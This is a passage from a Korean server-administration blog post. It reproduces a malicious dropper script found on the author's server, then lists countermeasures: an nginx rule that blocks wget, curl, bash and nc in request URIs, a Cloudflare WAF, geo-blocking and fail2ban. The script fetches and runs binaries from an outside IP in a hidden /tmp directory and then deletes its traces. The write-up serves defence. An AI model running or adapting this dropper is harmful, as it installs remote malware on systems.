chmod +xwr /tmp/.ICEi-unix
chmod +xwr /tmp/.ICEi-unix/*
TMNAME=$(head -3 /dev/urandom | tr -cd '[:alnum:]' | cut -c -6)
wget -q http://221.156.167.200:9090/js/grep.json -O /tmp/.ICEi-unix/config.json
wget -q http://221.156.167.200:9090/js/grep.rar -O /tmp/.ICEi-unix/javae
wget -q http://221.156.167.200:9090/js/grep00.sh -O /tmp/$TMNAME
chmod +x /tmp/.ICEi-unix/javae
cd /tmp
nohup sh $TMNAME >/dev/null 2>&1 &
nohup /tmp/.ICEi-unix/javae >/dev/null 2>&1 &
sleep 10
rm -f /tmp/*
else
echo "running"
fi
rm -f /tmp/*
조치내용
1. nginx wget 요청시 403
if ($request_uri ~* "(wget|curl|bash|sh|nc|perl|python)") {
return 403;
}
2. WAF 추가
CloudFlare에서 제공하는 WAF를 적용
NS 변경된지 확인하는 명령어
nslookup -type=ns yourdomain.com
3. 한국 ip 아닌 경우 막기
4. script 변경 감지 모니터링 추가
5. Bot 감지하여 차단
6. Fail2ban 셋팅
'서버' 카테고리의 다른 글
| docker container mariadb 데이터 그대로 다른 서버에 옮기기 (0) | 2026.05.12 |
|---|---|
| 웹 서버 자동화 공격 방어2 - fail2ban 셋팅 (0) | 2026.05.07 |
| 웹 서버 자동화 공격 방어 (CloudFlare 도메인 연결) (0) | 2026.05.04 |
| mac mini 서버 사용시 최적화를 위해 off 시킬 프로그램 (0) | 2026.04.30 |
| docker - mariadb 주기적 dump 로 백업관리 (0) | 2026.04.27 |
